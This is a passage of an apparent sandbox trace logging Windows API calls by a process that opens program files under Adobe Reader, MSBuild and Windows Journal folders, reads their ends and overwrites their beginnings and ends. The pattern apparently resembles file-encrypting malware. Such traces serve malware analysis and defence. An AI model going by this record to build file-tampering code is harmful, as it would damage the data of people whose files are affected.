| out: lpMultiByteStr="msolui100.rll", lpUsedDefaultChar=0x0) returned 13 [0066.053] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0066.056] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2a18 [0066.056] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0066.057] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x2a18 [0066.057] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.057] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0066.057] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.058] CloseHandle (hObject=0x1fc) returned 1 [0066.059] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0066.061] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.061] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x143e [0066.061] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0066.061] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.061] ReleaseMutex (hMutex=0x168) returned 1 [0066.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.VisualBasic.Targets", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0066.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.VisualBasic.Targets", cchWideChar=28, lpMultiByteStr=0x1f8feac, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workflow.VisualBasic.Targets", lpUsedDefaultChar=0x0) returned 28 [0066.061] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x143e, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf2bc*=0x143e, lpOverlapped=0x0) returned 1 [0066.282] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0066.283] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea5688*, nNumberOfBytesToWrite=0x19c6, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea5688*, lpNumberOfBytesWritten=0x2fdf2d0*=0x19c6, lpOverlapped=0x0) returned 1 [0066.283] CloseHandle (hObject=0x1bc) returned 1 [0066.284] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" (normalized: "c:\\program files\\windows journal\\en-us\\mspvwctl.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpFilePart=0x2fdf690*="MSPVWCTL.DLL.mui") returned 0x37 [0066.489] GetLastError () returned 0x5 [0066.501] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0066.501] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.501] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.501] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0066.502] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0066.502] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0066.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" (normalized: "c:\\program files\\windows journal\\en-us\\mspvwctl.dll.mui")) returned 0x20 [0066.502] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp" (normalized: "c:\\program files\\windows journal\\templates\\genko_2.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp", lpFilePart=0x2fdf690*="Genko_2.jtp") returned 0x36 [0066.600] GetLastError () returned 0x5 [0066.600] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0066.601] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.601] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.601] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0066.601] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0066.601] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0066.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp" (normalized: "c:\\program files\\windows journal\\templates\\genko_2.jtp")) returned 0x20 [0067.675] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\bitkinex.exe" (normalized: "c:\\program files\\windows mail\\bitkinex.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.675] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\bitkinex.exe", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\bitkinex.exe", lpFilePart=0x2fdf690*="bitkinex.exe") returned 0x2a [0067.675] GetLastError () returned 0x20 [0067.675] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x51 [0067.675] LocalFree (hMem=0x696d00) returned 0x0 [0067.675] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0067.675] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0067.676] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0067.676] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0067.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\bitkinex.exe" (normalized: "c:\\program files\\windows mail\\bitkinex.exe")) returned 0x20 [0067.676] CreateFileW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoacq.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.676] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui", nBufferLength=0x104, lpBuffer=0x2fdf694, lpFilePart=0x2fdf690 | out: lpBuffer="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui", lpFilePart=0x2fdf690*="PhotoAcq.dll.mui") returned 0x3c [0067.676] GetLastError () returned 0x5 [0067.676] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2fdf8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˽폈H˽퐔H˽L˽ꥠǷ\x01") returned 0x13 [0067.677] LocalFree (hMem=0x69e2b0) returned 0x0 [0067.677] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2fdd860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0067.677] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2fdf894) [0067.677] RtlUnwind (TargetFrame=0x2fdf8fc, TargetIp=0x406ffc, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0067.677] RtlUnwind (TargetFrame=0x2fdf920, TargetIp=0x407184, ExceptionRecord=0x2fdf378, ReturnValue=0x0) [0067.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoacq.dll.mui")) returned 0x20 [0067.678] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0068.371] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0068.371] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4268 [0068.372] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0068.372] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.372] ReleaseMutex (hMutex=0x168) returned 1 [0068.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Benioku.htm", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Benioku.htm", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Benioku.htm", lpUsedDefaultChar=0x0) returned 11 [0068.372] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0068.399] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3268 [0068.399] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0068.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3268 [0068.412] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.412] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0068.413] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0068.413] CloseHandle (hObject=0x1dc) returned 1 [0068.428] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0068.443] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0068.443] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x43c7 [0068.443] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0068.443] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.443] ReleaseMutex (hMutex=0x168) returned 1 [0068.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lisezmoi.htm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lisezmoi.htm", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lisezmoi.htm", lpUsedDefaultChar=0x0) returned 12 [0068.443] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0068.459] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x33c7 [0068.459] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0068.470] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x33c7 [0068.470] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.470] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0068.470] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0068.470] CloseHandle (hObject=0x1bc) returned 1 [0068.486] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeCollabSync.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobecollabsync.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0068.487] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0068.487] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x128fa0 [0068.487] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0068.487] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.488] ReleaseMutex (hMutex=0x168) returned 1 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0068.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.exe", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.exe", lpUsedDefaultChar=0x0) returned 19 [0068.488] ReadFile (in: hFile=0x1bc, lpBuffer=0x2874088, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0068.505] ReadFile (in: hFile=0x1bc, lpBuffer=0x2874088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0068.507] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x127fa0 [0068.508] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0068.514] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x127fa0 [0068.515] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.516] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0068.516] WriteFile (in: hFile=0x1bc, lpBuffer=0x28840b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28840b8*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.517] WriteFile (in: hFile=0x1bc, lpBuffer=0x28840b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28840b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0068.517] CloseHandle (hObject=0x1bc) returned 1 [0069.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.276] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.285] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e00 [0069.289] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.289] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.289] ReleaseMutex (hMutex=0x168) returned 1 [0069.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ESP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ESP", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.ESP", lpUsedDefaultChar=0x0) returned 11 [0069.290] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0069.292] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0069.292] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2388, lpOverlapped=0x0) returned 1 [0069.293] CloseHandle (hObject=0x1dc) returned 1 [0069.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0069.295] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.296] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1e00 [0069.296] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0069.296] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.296] ReleaseMutex (hMutex=0x168) returned 1 [0069.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NLD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.NLD", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.NLD", lpUsedDefaultChar=0x0) returned 11 [0069.296] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, 